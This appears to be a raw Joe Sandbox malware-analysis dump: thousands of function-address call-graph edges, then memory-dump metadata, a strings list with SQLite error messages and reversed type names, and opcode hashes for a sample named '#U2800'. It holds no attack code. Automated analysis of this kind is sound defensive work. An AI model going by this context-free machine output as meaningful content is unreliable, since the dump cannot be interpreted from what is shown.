107352->107354 107354->107355 107355->107322 107356->107328 107357->107326 107358->107352 107359->107352 107361 7ffdfb7c56eb 107360->107361 107363 7ffdfb7c5643 107360->107363 107362 7ffdfb734c20 _raise_excf 11 API calls 107361->107362 107364 7ffdfb72daad 107361->107364 107362->107364 107363->107361 107365 7ffdfb7c5910 _raise_excf 11 API calls 107363->107365 107364->107337 107365->107363 107366->107332 107368 7ffdfb75442f 107367->107368 107369 7ffdfb7544b9 _raise_excf 107367->107369 107372 7ffdfb754498 107368->107372 107404 7ffdfb83eb70 11 API calls _raise_excf 107368->107404 107369->107205 107370 7ffdfb734c20 _raise_excf 11 API calls 107370->107369 107372->107369 107372->107370 107374 7ffdfb8107a5 107373->107374 107396 7ffdfb7e0381 107373->107396 107374->107396 107405 7ffdfb81f170 107374->107405 107376 7ffdfb810851 107377 7ffdfb810863 107376->107377 107436 7ffdfb821490 47 API calls 2 library calls 107376->107436 107379 7ffdfb83ec40 _raise_excf 11 API calls 107377->107379 107381 7ffdfb81086b 107379->107381 107427 7ffdfb7e1da0 107381->107427 107382 7ffdfb810802 _raise_excf 107382->107376 107413 7ffdfb7dc010 107382->107413 107385 7ffdfb80cf90 _raise_excf 11 API calls 107394 7ffdfb810bc2 _raise_excf 107385->107394 107386 7ffdfb810d0d 107387 7ffdfb80cf90 _raise_excf 11 API calls 107386->107387 107388 7ffdfb810d19 107387->107388 107397 7ffdfb810d62 _raise_excf 107388->107397 107438 7ffdfb7e8e50 11 API calls _raise_excf 107388->107438 107389 7ffdfb810873 _raise_excf 107433 7ffdfb80cf90 107389->107433 107392 7ffdfb810a86 _raise_excf 107392->107385 107393 7ffdfb810d39 107393->107397 107439 7ffdfb8527e0 11 API calls _raise_excf 107393->107439 107394->107386 107437 7ffdfb75e530 47 API calls _raise_excf 107394->107437 107396->107070 107397->107396 107398 7ffdfb87996c 11 API calls 107397->107398 107398->107396 107399->107195 107400->107198 107401->107203 107402->107201 107403->107212 107404->107368 107408 7ffdfb81f19f _raise_excf 107405->107408 107406 7ffdfb81f20f 107407 7ffdfb754410 _raise_excf 11 API calls 107406->107407 107410 7ffdfb81f221 107407->107410 107408->107406 107440 7ffdfb7de8c0 107408->107440 107412 7ffdfb81f27f _raise_excf 107410->107412 107452 7ffdfb81e870 47 API calls _raise_excf 107410->107452 107412->107382 107414 7ffdfb7dc028 _raise_excf 107413->107414 107415 7ffdfb7de8c0 _raise_excf 66 API calls 107414->107415 107419 7ffdfb7dc043 _raise_excf 107415->107419 107416 7ffdfb8138b0 _raise_excf 68 API calls 107417 7ffdfb7dc136 107416->107417 107418 7ffdfb7dc15c 107417->107418 107420 7ffdfb734c20 _raise_excf 11 API calls 107417->107420 107421 7ffdfb7c5910 _raise_excf 11 API calls 107418->107421 107424 7ffdfb7dc178 107418->107424 107419->107416 107423 7ffdfb7dc18b 107419->107423 107420->107418 107421->107424 107422 7ffdfb734c20 _raise_excf 11 API calls 107422->107423 107425 7ffdfb734c20 _raise_excf 11 API calls 107423->107425 107424->107422 107426 7ffdfb7dc1ba 107425->107426 107426->107382 107428 7ffdfb7e1ebe 107427->107428 107431 7ffdfb7e1dbf _raise_excf 107427->107431 107429 7ffdfb7e1f31 _raise_excf 107428->107429 107430 7ffdfb734c20 _raise_excf 11 API calls 107428->107430 107429->107389 107430->107429 107431->107428 107432 7ffdfb734c20 _raise_excf 11 API calls 107431->107432 107432->107431 107434 7ffdfb734c20 _raise_excf 11 API calls 107433->107434 107435 7ffdfb80cfb5 107434->107435 107435->107392 107436->107377 107437->107394 107438->107393 107439->107397 107441 7ffdfb7de8e7 _raise_excf 107440->107441 107443 7ffdfb7de911 107441->107443 107457 7ffdfb7d2250 65 API calls _raise_excf 107441->107457 107445 7ffdfb7de937 107443->107445 107458 7ffdfb7df8b0 65 API calls _raise_excf 107443->107458 107449 7ffdfb7de9dd _raise_excf 107445->107449 107459 7ffdfb814a30 66 API calls _raise_excf 107445->107459 107448 7ffdfb7de9fa _raise_excf 107448->107408 107453 7ffdfb752d90 107449->107453 107450 7ffdfb7de953 _raise_excf 107450->107449 107460 7ffdfb7c1310 66 API calls _raise_excf 107450->107460 107452->107412 107456 7ffdfb752dbd _raise_excf 107453->107456 107454 7ffdfb752dca 107454->107448 107456->107454 107461 7ffdfb7c1310 66 API calls _raise_excf 107456->107461 107457->107443 107458->107445 107459->107450 107460->107449 107461->107454 107462 7ffdfb724ef0 107463 7ffdfb725022 107462->107463 107464 7ffdfb724f11 107462->107464 107464->107463 107466 7ffdfb862200 107464->107466 107467 7ffdfb86253f _raise_excf 107466->107467 107471 7ffdfb86223e 107466->107471 107467->107463 107469 7ffdfb724d70 57 API calls 107469->107471 107471->107467 107471->107469 107473 7ffdfb86257d 107471->107473 107476 7ffdfb862700 107471->107476 107485 7ffdfb8610a0 47 API calls _raise_excf 107471->107485 107486 7ffdfb748730 47 API calls _raise_excf 107471->107486 107487 7ffdfb86b834 8 API calls 107473->107487 107475 7ffdfb862582 107477 7ffdfb862712 107476->107477 107480 7ffdfb862758 107476->107480 107479 7ffdfb862723 107477->107479 107477->107480 107478 7ffdfb8627b7 107478->107471 107488 7ffdfb861a30 55 API calls _raise_excf 107479->107488 107480->107478 107489 7ffdfb861a30 55 API calls _raise_excf 107480->107489 107483 7ffdfb862752 107483->107471 107484 7ffdfb8627b1 107484->107471 107485->107471 107486->107471 107487->107475 107488->107483 107489->107484 107490 7ffdfb825d90 107491 7ffdfb825db6 107490->107491 107495 7ffdfb825e8e 107490->107495 107492 7ffdfb825df7 107491->107492 107493 7ffdfb83fa20 72 API calls 107491->107493 107491->107495 107500 7ffdfb83fa20 107492->107500 107493->107492 107497 7ffdfb83fa20 72 API calls 107498 7ffdfb825e5a 107497->107498 107498->107495 107499 7ffdfb83fa20 72 API calls 107498->107499 107499->107495 107501 7ffdfb825e21 107500->107501 107505 7ffdfb83fa37 107500->107505 107501->107495 107501->107497 107502 7ffdfb83f940 72 API calls 107502->107505 107504 7ffdfb83fa20 72 API calls 107504->107505 107505->107501 107505->107502 107505->107504 107507 7ffdfb7d2570 107505->107507 107537 7ffdfb85a3f0 72 API calls 107505->107537 107517 7ffdfb7d25c9 107507->107517 107528 7ffdfb7d25c5 _raise_excf 107507->107528 107508 7ffdfb7d2a25 107508->107517 107594 7ffdfb81c3a0 47 API calls 2 library calls 107508->107594 107510 7ffdfb83fa20 72 API calls 107510->107528 107512 7ffdfb7d3a36 107597 7ffdfb7635a0 47 API calls _raise_excf 107512->107597 107513 7ffdfb811fc0 47 API calls new[] 107513->107528 107516 7ffdfb7d3a4e 107516->107517 107598 7ffdfb7e8ea0 47 API calls _raise_excf 107516->107598 107517->107505 107520 7ffdfb7d2b65 107596 7ffdfb7e8ea0 47 API calls _raise_excf 107520->107596 107521 7ffdfb811f90 _raise_excf 47 API calls 107521->107528 107523 7ffdfb7d2b4e 107595 7ffdfb7e8ea0 47 API calls _raise_excf 107523->107595 107525 7ffdfb7e8ea0 47 API calls _raise_excf 107534 7ffdfb7d2a42 _raise_excf 107525->107534 107528->107508 107528->107510 107528->107513 107528->107517 107528->107520 107528->107521 107528->107523 107530 7ffdfb7e8ea0 47 API calls _raise_excf 107528->107530 107538 7ffdfb7ccd40 107528->107538 107577 7ffdfb8118e0 107528->107577 107590 7ffdfb7e24b0 48 API calls 2 library calls 107528->107590 107591 7ffdfb855f40 72 API calls _raise_excf 107528->107591 107592 7ffdfb8263d0 72 API calls _raise_excf 107528->107592 107593 7ffdfb80d7c0 47 API calls _raise_excf 107528->107593 107530->107528 107531 7ffdfb7eef80 47 API calls 107531->107534 107532 7ffdfb811f90 47 API calls _raise_excf 107532->107534 107533 7ffdfb7ef070 47 API calls 107533->107534 107534->107512 107534->107516 107534->107517 107534->107525 107534->107531 107534->107532 107534->107533 107535 7ffdfb75d830 47 API calls 107534->107535 107536 7ffdfb7edd50 47 API calls _raise_excf 107534->107536 107535->107534 107536->107534 107537->107505 107539 7ffdfb7ccd79 107538->107539 107562 7ffdfb7cce2a _raise_excf 107538->107562 107540 7ffdfb7cce8a 107539->107540 107541 7ffdfb7cce1f 107539->107541 107539->107562 107542 7ffdfb7ccea9 107540->107542 107543 7ffdfb7cce90 107540->107543 107599 7ffdfb7e8ea0 47 API calls _raise_excf 107541->107599 107546 7ffdfb811fc0 new[] 47 API calls 107542->107546 107547 7ffdfb7cceae _raise_excf 107542->107547 107600 7ffdfb7e8ea0 47 API calls _raise_excf 107543->107600 107546->107547 107548 7ffdfb811fc0 new[] 47 API calls 107547->107548 107549 7ffdfb7ccf07 _raise_excf 107547->107549 107551 7ffdfb7ccf51 107547->107551 107547->107562 107548->107549 107561 7ffdfb7ccf7a 107549->107561 107601 7ffdfb816170 47 API calls 2 library calls 107549->107601 107554 7ffdfb811fc0 new[] 47 API calls 107551->107554 107557 7ffdfb7ccf72 _raise_excf 107551->107557 107552 7ffdfb7cd08b 107556 7ffdfb7cd0ad 107552->107556 107552->107562 107568 7ffdfb7cd0cb 107552->107568 107554->107557 107555 7ffdfb7ccf4c 107555->107551 107555->107561 107603 7ffdfb7e8ea0 47 API calls _raise_excf 107556->107603 107602 7ffdfb8263d0 72 API calls _raise_excf 107557->107602 107558 7ffdfb734c20 _raise_excf 11 API calls 107558->107562 107560 7ffdfb7cd0ed 107563 7ffdfb7cd124 107560->107563 107564 7ffdfb7cd2e0 107560->107564 107561->107558 107561->107562 107562->107528 107566 7ffdfb83fa20 72 API calls 107563->107566 107565 7ffdfb83fa20 72 API calls 107564->107565 107569 7ffdfb7cd13c 107565->107569 107566->107569 107567 7ffdfb7cd30d 107606 7ffdfb7e24b0 48 API calls 2 library calls 107567->107606 107568->107560 107574 7ffdfb7cd2bf 107568->107574 107569->107562 107569->107567 107571 7ffdfb7cd1a4 107569->107571 107604 7ffdfb7e8ea0 47 API calls _raise_excf 107571->107604 107572 7ffdfb7cd320 107572->107562 107575 7ffdfb83fa20 72 API calls 107572->107575 107605 7ffdfb7e8ea0 47 API calls _raise_excf 107574->107605 107575->107562 107578 7ffdfb81190c 107577->107578 107588 7ffdfb811911 _raise_excf 107577->107588 107607 7ffdfb81d630 107578->107607 107580 7ffdfb811a0a 107581 7ffdfb811a50 107580->107581 107582 7ffdfb811a66 107580->107582 107586 7ffdfb811a0e 107580->107586 107613 7ffdfb7e8ea0 47 API calls _raise_excf 107581->107613 107614 7ffdfb7e8ea0 47 API calls _raise_excf 107582->107614 107585 7ffdfb8119f7 107585->107580 107612 7ffdfb83def0 47 API calls 2 library calls 107585->107612 107586->107528 107588->107580 107588->107585 107588->107586 107611 7ffdfb83dc00 47 API calls 2 library calls 107588->107611 107590->107528 107591->107528 107592->107528 107593->107528 107594->107534 107595->107517 107596->107517 107597->107516 107598->107517 107599->107562 107600->107562 107601->107555 107602->107552 107603->107562 107604->107562 107605->107562 107606->107572 107608 7ffdfb81d649 107607->107608 107610 7ffdfb81d655 107607->107610 107615 7ffdfb80da40 107608->107615 107610->107588 107611->107585 107612->107580 107613->107586 107614->107586 107616 7ffdfb80da89 107615->107616 107617 7ffdfb80da7c 107615->107617 107618 7ffdfb80dadd 107616->107618 107620 7ffdfb80de10 _raise_excf 72 API calls 107616->107620 107621 7ffdfb80de10 107617->107621 107618->107610 107620->107616 107651 7ffdfb80db10 107621->107651 107623 7ffdfb80dec4 _raise_excf 107627 7ffdfb80deeb _raise_excf 107623->107627 107632 7ffdfb80df54 _raise_excf 107623->107632 107633 7ffdfb80df59 _raise_excf 107623->107633 107686 7ffdfb752010 107623->107686 107624 7ffdfb80e370 107742 7ffdfb81e910 47 API calls 2 library calls 107624->107742 107627->107616 107629 7ffdfb80df39 107630 7ffdfb80df3f _raise_excf 107629->107630 107629->107633 107737 7ffdfb826190 47 API calls 2 library calls 107630->107737 107632->107624 107632->107627 107741 7ffdfb813030 47 API calls _raise_excf 107632->107741 107635 7ffdfb80dfc4 _raise_excf 107633->107635 107638 7ffdfb80e00e _raise_excf 107633->107638 107634 7ffdfb80e20a 107636 7ffdfb811f90 _raise_excf 47 API calls 107634->107636 107635->107634 107642 7ffdfb80e15f _raise_excf 107635->107642 107648 7ffdfb80dfe9 _raise_excf 107635->107648 107637 7ffdfb80e243 107636->107637 107697 7ffdfb732f50 107637->107697 107641 7ffdfb734c20 _raise_excf 11 API calls 107638->107641 107638->107648 107641->107648 107644 7ffdfb734c20 _raise_excf 11 API calls 107642->107644 107642->107648 107643 7ffdfb80e297 _raise_excf 107645 7ffdfb80e2f4 107643->107645 107738 7ffdfb7d90d0 72 API calls _raise_excf 107643->107738 107644->107648 107645->107648 107739 7ffdfb81e870 47 API calls _raise_excf 107645->107739 107646 7ffdfb80e271 107646->107643 107649 7ffdfb734c20 _raise_excf 11 API calls 107646->107649 107648->107632 107740 7ffdfb7dc1d0 68 API calls _raise_excf 107648->107740 107649->107643 107652 7ffdfb80db32 107651->107652 107670 7ffdfb80ddc5 107651->107670 107653 7ffdfb80db3b 107652->107653 107656 7ffdfb80db53 107652->107656 107743 7ffdfb75ca80 47 API calls _raise_excf 107653->107743 107655 7ffdfb80db46 107655->107623 107658 7ffdfb80db92 _raise_excf 107656->107658 107663 7ffdfb80dd44 _raise_excf 107656->107663 107659 7ffdfb80dbe4 107658->107659 107744 7ffdfb75ca80 47 API calls _raise_excf 107658->107744 107661 7ffdfb81baa0 _raise_excf 72 API calls 107659->107661 107665 7ffdfb80dc20 107661->107665 107662 7ffdfb80dc51 107664 7ffdfb80dc96 107662->107664 107662->107670 107673 7ffdfb80dcdc _raise_excf 107662->107673 107663->107670 107753 7ffdfb75ca80 47 API calls _raise_excf 107663->107753 107748 7ffdfb748730 47 API calls _raise_excf 107664->107748 107665->107662 107667 7ffdfb80dc53 107665->107667 107668 7ffdfb80dc49 107665->107668 107667->107662 107746 7ffdfb735f90 47 API calls _raise_excf 107667->107746 107745 7ffdfb813030 47 API calls _raise_excf 107668->107745 107669 7ffdfb80dca5 107749 7ffdfb748730 47 API calls _raise_excf 107669->107749 107670->107623 107750 7ffdfb83cc90 72 API calls _raise_excf 107673->107750 107675 7ffdfb80dd0f 107751 7ffdfb82eeb0 11 API calls _raise_excf 107675->107751 107676 7ffdfb80dccd 107676->107623 107679 7ffdfb80dc64 107747 7ffdfb75ca80 47 API calls _raise_excf 107679->107747 107681 7ffdfb80dd19 107682 7ffdfb80dd2d 107681->107682 107752 7ffdfb74ee90 11 API calls _raise_excf 107681->107752 107684 7ffdfb810790 _raise_excf 68 API calls 107682->107684 107685 7ffdfb80dd35 107684->107685 107685->107623 107691 7ffdfb75204b _raise_excf 107686->107691 107687 7ffdfb7520a6 _raise_excf 107687->107629 107688 7ffdfb7522e8 107688->107687 107774 7ffdfb7c0a00 47 API calls 2 library calls 107688->107774 107691->107687 107691->107688 107695 7ffdfb752262 107691->107695 107754 7ffdfb7b96b0 107691->107754 107770 7ffdfb7c1310 66 API calls _raise_excf 107691->107770 107771 7ffdfb813700 RaiseException _raise_excf 107691->107771 107772 7ffdfb7be860 48 API calls _raise_excf 107691->107772 107695->107687 107695->107688 107773 7ffdfb7c1530 48 API calls _raise_excf 107695->107773 107698 7ffdfb732f80 107697->107698 107699 7ffdfb732f77 107697->107699 107698->107699 107700 7ffdfb732fea 107698->107700 107867 7ffdfb748730 47 API calls _raise_excf 107699->107867 107720 7ffdfb733047 _raise_excf 107700->107720 107869 7ffdfb7e8e50 11 API calls _raise_excf 107700->107869 107702 7ffdfb732faf 107868 7ffdfb748730 47 API calls _raise_excf 107702->107868 107705 7ffdfb732fd9 107705->107646 107706 7ffdfb811b00 _raise_excf 72 API calls 107706->107720 107708 7ffdfb73365f 107723 7ffdfb733607 _raise_excf 107708->107723 107881 7ffdfb735f90 47 API calls _raise_excf 107708->107881 107710 7ffdfb7334b1 107711 7ffdfb733509 107710->107711 107716 7ffdfb7334ee _raise_excf 107710->107716 107878 7ffdfb83cc90 72 API calls _raise_excf 107710->107878 107879 7ffdfb82eeb0 11 API calls _raise_excf 107711->107879 107713 7ffdfb73367a 107717 7ffdfb733698 107713->107717 107719 7ffdfb811fc0 new[] 47 API calls 107713->107719 107716->107723 107880 7ffdfb74ee90 11 API calls _raise_excf 107716->107880 107717->107723 107882 7ffdfb7e8e50 11 API calls _raise_excf 107717->107882 107719->107717 107720->107706 107720->107710 107720->107716 107724 7ffdfb7334b8 107720->107724 107725 7ffdfb7e8e50 11 API calls _raise_excf 107720->107725 107733 7ffdfb74ee90 11 API calls _raise_excf 107720->107733 107734 7ffdfb7334a1 107720->107734 107736 7ffdfb80db10 72 API calls 107720->107736 107847 7ffdfb739dd0 107720->107847 107870 7ffdfb759680 47 API calls _raise_excf 107720->107870 107871 7ffdfb850e80 47 API calls _raise_excf 107720->107871 107872 7ffdfb83cc90 72 API calls _raise_excf 107720->107872 107873 7ffdfb82eeb0 11 API calls _raise_excf 107720->107873 107723->107646 107727 7ffdfb7334cf 107724->107727 107875 7ffdfb83cc90 72 API calls _raise_excf 107724->107875 107725->107720 107876 7ffdfb82eeb0 11 API calls _raise_excf 107727->107876 107730 7ffdfb7334d7 107877 7ffdfb7e8e50 11 API calls _raise_excf 107730->107877 107733->107720 107874 7ffdfb813030 47 API calls _raise_excf 107734->107874 107736->107720 107737->107632 107738->107645 107739->107648 107740->107632 107741->107624 107742->107627 107743->107655 107744->107659 107745->107662 107746->107679 107747->107662 107748->107669 107749->107676 107750->107675 107751->107681 107752->107682 107753->107670 107775 7ffdfb814fe0 107754->107775 107756 7ffdfb7b96c1 107760 7ffdfb7b97f2 _raise_excf 107756->107760 107785 7ffdfb7ae4b0 107756->107785 107757 7ffdfb7b96e8 107757->107760 107761 7ffdfb7b97e1 107757->107761 107764 7ffdfb7b98a9 _raise_excf 107757->107764 107804 7ffdfb814980 107757->107804 107760->107691 107761->107760 107762 7ffdfb7b9887 107761->107762 107763 7ffdfb7b9857 _raise_excf 107761->107763 107761->107764 107762->107764 107810 7ffdfb7e3ce0 47 API calls _raise_excf 107762->107810 107808 7ffdfb76ab90 11 API calls _raise_excf 107763->107808 107764->107760 107811 7ffdfb7c1310 66 API calls _raise_excf 107764->107811 107767 7ffdfb7b9873 107809 7ffdfb814ea0 47 API calls _raise_excf 107767->107809 107770->107691 107771->107691 107772->107691 107773->107688 107774->107687 107776 7ffdfb8152c0 _raise_excf 107775->107776 107780 7ffdfb815010 _raise_excf 107775->107780 107783 7ffdfb8150af _raise_excf 107776->107783 107812 7ffdfb83ed30 107776->107812 107778 7ffdfb8151b4 _raise_excf 107778->107776 107782 7ffdfb814980 _raise_excf 57 API calls 107778->107782 107778->107783 107779 7ffdfb815181 _raise_excf 107779->107778 107779->107783 107819 7ffdfb7c1ee0 48 API calls _raise_excf 107779->107819 107780->107776 107780->107778 107780->107779 107780->107783 107818 7ffdfb7dfb50 47 API calls _raise_excf 107780->107818 107782->107776 107783->107756 107786 7ffdfb7ae505 107785->107786 107787 7ffdfb7ae4d2 107785->107787 107820 7ffdfb72e160 107786->107820 107834 7ffdfb748730 47 API calls _raise_excf 107787->107834 107789 7ffdfb7ae64c 107835 7ffdfb748730 47 API calls _raise_excf 107789->107835 107790 7ffdfb7ae6a4 107794 7ffdfb7ae6d2 107790->107794 107797 7ffdfb7ae6bc 107790->107797 107792 7ffdfb7ae4fe new[] 107792->107757 107795 7ffdfb7ae5f6 _raise_excf 107794->107795 107800 7ffdfb7ae6ee 107794->107800 107795->107792 107836 7ffdfb7c1310 66 API calls _raise_excf 107795->107836 107796 7ffdfb7ae530 _raise_excf 107796->107789 107796->107790 107796->107792 107796->107795 107828 7ffdfb7c8340 107797->107828 107799 7ffdfb7ae715 107838 7ffdfb74be10 47 API calls 2 library calls 107799->107838 107800->107792 107800->107799 107837 7ffdfb7dbae0 47 API calls 2 library calls 107800->107837 107805 7ffdfb814995 107804->107805 107807 7ffdfb8149e5 107804->107807 107805->107807 107839 7ffdfb7c0b50 107805->107839 107807->107761 107808->107767 107809->107760 107810->107764 107811->107760 107813 7ffdfb83ed6d _raise_excf 107812->107813 107814 7ffdfb859c70 _raise_excf 66 API calls 107813->107814 107815 7ffdfb83ee01 _raise_excf 107813->107815 107817 7ffdfb83edd0 _raise_excf 107813->107817 107814->107813 107816 7ffdfb7d2470 _raise_excf RaiseException 107815->107816 107815->107817 107816->107817 107817->107783 107818->107779 107819->107778 107824 7ffdfb72e178 107820->107824 107821 7ffdfb72e194 107821->107796 107822 7ffdfb7c5a50 47 API calls 107826 7ffdfb7c57b3 107822->107826 107823 7ffdfb7c5883 107825 7ffdfb7c5470 47 API calls 107823->107825 107824->107821 107824->107822 107824->107826 107825->107821 107826->107821 107826->107823 107827 7ffdfb7c5a10 11 API calls 107826->107827 107827->107823 107829 7ffdfb7c836a 107828->107829 107830 7ffdfb7c8377 107828->107830 107831 7ffdfb83f510 _raise_excf 65 API calls 107829->107831 107832 7ffdfb7c8387 107830->107832 107833 7ffdfb7236f0 56 API calls 107830->107833 107831->107830 107832->107795 107833->107832 107834->107792 107835->107795 107836->107792 107837->107799 107838->107792 107840 7ffdfb7c0b60 _raise_excf 107839->107840 107841 7ffdfb811fc0 new[] 47 API calls 107840->107841 107842 7ffdfb7c0c47 _raise_excf 107840->107842 107843 7ffdfb7c0bc2 new[] 107841->107843 107842->107807 107843->107842 107846 7ffdfb724510 57 API calls 107843->107846 107844 7ffdfb734c20 _raise_excf 11 API calls 107844->107842 107845 7ffdfb7c0c41 _raise_excf 107845->107842 107845->107844 107846->107845 107848 7ffdfb739df0 107847->107848 107849 7ffdfb739de7 107847->107849 107848->107849 107850 7ffdfb739e3e 107848->107850 107901 7ffdfb748730 47 API calls _raise_excf 107849->107901 107883 7ffdfb827db0 107850->107883 107853 7ffdfb739e06 107902 7ffdfb748730 47 API calls _raise_excf 107853->107902 107855 7ffdfb739e30 107855->107720 107856 7ffdfb739ec1 107856->107720 107859 7ffdfb739ec6 107863 7ffdfb739ed2 107859->107863 107905 7ffdfb850e80 47 API calls _raise_excf 107859->107905 107860 7ffdfb739e69 107860->107856 107860->107859 107861 7ffdfb827db0 _raise_excf 72 API calls 107860->107861 107903 7ffdfb81e5c0 72 API calls _raise_excf 107860->107903 107904 7ffdfb73b090 72 API calls _raise_excf 107860->107904 107861->107860 107865 7ffdfb734c20 _raise_excf 11 API calls 107863->107865 107866 7ffdfb739f2c _raise_excf 107863->107866 107865->107866 107866->107856 107906 7ffdfb74ee90 11 API calls _raise_excf 107866->107906 107867->107702 107868->107705 107869->107720 107870->107720 107871->107720 107872->107720 107873->107720 107874->107710 107875->107727 107876->107730 107877->107716 107878->107711 107879->107716 107880->107708 107881->107713 107882->107723 107884 7ffdfb827dcd 107883->107884 107897 7ffdfb827e25 _raise_excf 107883->107897 107885 7ffdfb827dec 107884->107885 107884->107897 107913 7ffdfb73b090 72 API calls _raise_excf 107884->107913 107888 7ffdfb827df5 107885->107888 107885->107897 107886 7ffdfb827ea0 107915 7ffdfb839d70 47 API calls _raise_excf 107886->107915 107887 7ffdfb827ea7 107907 7ffdfb82f6e0 107887->107907 107892 7ffdfb828027 107888->107892 107914 7ffdfb83d890 47 API calls _raise_excf 107888->107914 107892->107860 107894 7ffdfb827e16 107894->107860 107895 7ffdfb827ebf 107895->107860 107896 7ffdfb827ea5 _raise_excf 107896->107895 107900 7ffdfb827ef3 _raise_excf 107896->107900 107916 7ffdfb83d890 47 API calls _raise_excf 107896->107916 107897->107886 107897->107887 107900->107892 107917 7ffdfb74ee90 11 API calls _raise_excf 107900->107917 107901->107853 107902->107855 107903->107860 107904->107860 107905->107863 107906->107856 107909 7ffdfb82f771 _raise_excf 107907->107909 107908 7ffdfb830443 107909->107908 107910 7ffdfb813030 _raise_excf 47 API calls 107909->107910 107911 7ffdfb830434 107910->107911 107912 7ffdfb82f630 _raise_excf 47 API calls 107911->107912 107912->107908 107913->107884 107914->107894 107915->107896 107916->107900 107917->107892 107918 7ffdfb7bbe60 107921 7ffdfb7bbf3b 107918->107921 107925 7ffdfb7bbe87 107918->107925 107919 7ffdfb7bbf42 107920 7ffdfb7bbf69 107932 7ffdfb7acc00 107920->107932 107921->107919 107921->107920 107924 7ffdfb734c20 _raise_excf 11 API calls 107921->107924 107923 7ffdfb7bc01b 107943 7ffdfb748730 47 API calls _raise_excf 107923->107943 107924->107920 107925->107919 107925->107923 107927 7ffdfb7bbe8d _raise_excf 107925->107927 107927->107919 107928 7ffdfb7bbfe6 107927->107928 107929 7ffdfb7bbff2 107927->107929 107941 7ffdfb7e3ce0 47 API calls _raise_excf 107928->107941 107942 7ffdfb7bb8c0 66 API calls _raise_excf 107929->107942 107933 7ffdfb7acc1d 107932->107933 107934 7ffdfb7acc64 107932->107934 107944 7ffdfb748730 47 API calls _raise_excf 107933->107944 107940 7ffdfb7ae4b0 66 API calls 107934->107940 107936 7ffdfb7acc4e 107936->107925 107937 7ffdfb7acc79 107939 7ffdfb7acc7d _raise_excf 107937->107939 107945 7ffdfb753130 47 API calls _raise_excf 107937->107945 107939->107925 107940->107937 107941->107919 107942->107919 107943->107919 107944->107936 107945->107939 107946 7ffdfb7d6210 107948 7ffdfb7d6252 _raise_excf 107946->107948 107956 7ffdfb7d6641 _raise_excf 107946->107956 107951 7ffdfb7d64f9 _raise_excf 107948->107951 107948->107956 107967 7ffdfb81e530 47 API calls 2 library calls 107948->107967 107950 7ffdfb7d6691 107954 7ffdfb7d6627 _raise_excf 107950->107954 107950->107956 107957 7ffdfb75d870 107950->107957 107951->107950 107952 7ffdfb7d6613 107951->107952 107968 7ffdfb7e8ea0 47 API calls _raise_excf 107952->107968 107955 7ffdfb734c20 _raise_excf 11 API calls 107954->107955 107954->107956 107955->107956 107958 7ffdfb75d891 107957->107958 107965 7ffdfb75d8fe _raise_excf 107957->107965 107959 7ffdfb75d992 107958->107959 107963 7ffdfb75d8ab _raise_excf 107958->107963 107969 7ffdfb81d690 107959->107969 107961 7ffdfb75d99d 107961->107965 107977 7ffdfb813030 47 API calls _raise_excf 107961->107977 107964 7ffdfb734c20 _raise_excf 11 API calls 107963->107964 107963->107965 107966 7ffdfb75d97f 107964->107966 107965->107954 107966->107954 107967->107951 107968->107954 107970 7ffdfb81d6a5 107969->107970 107971 7ffdfb81d6ce _raise_excf 107970->107971 107972 7ffdfb81d6bc 107970->107972 107975 7ffdfb81d78d 107971->107975 107978 7ffdfb733a10 107971->107978 107973 7ffdfb734c20 _raise_excf 11 API calls 107972->107973 107974 7ffdfb81d6c1 107973->107974 107974->107961 107975->107961 107977->107965 107979 7ffdfb733a2d 107978->107979 107980 7ffdfb733a52 107979->107980 107984 7ffdfb874c40 47 API calls 2 library calls 107979->107984 107980->107975 107982 7ffdfb733a3d 107985 7ffdfb748730 47 API calls _raise_excf 107982->107985 107984->107982 107985->107980
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: C$C$C$C$always$aolf$bolb$bolc$buod$duplicate column name: %s$generated$laer$rahc$tni$too many columns on %s$txet
                                                                                                                                                                                                          • API String ID: 0-3729332310
                                                                                                                                                                                                          • Opcode ID: ea2fbe33094eae806ce62196b15312f51d1d82f5020227fa7196b640aa86429b
                                                                                                                                                                                                          • Instruction ID: bcaca3f3568e5854f966f92b12c158acc5b29b5b1b4205d637421933023c5d78
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea2fbe33094eae806ce62196b15312f51d1d82f5020227fa7196b640aa86429b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 79220762F0E7D741EB658B259870FBA7B91EB497C4F144036DAAE472F9CA2CE5498300
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
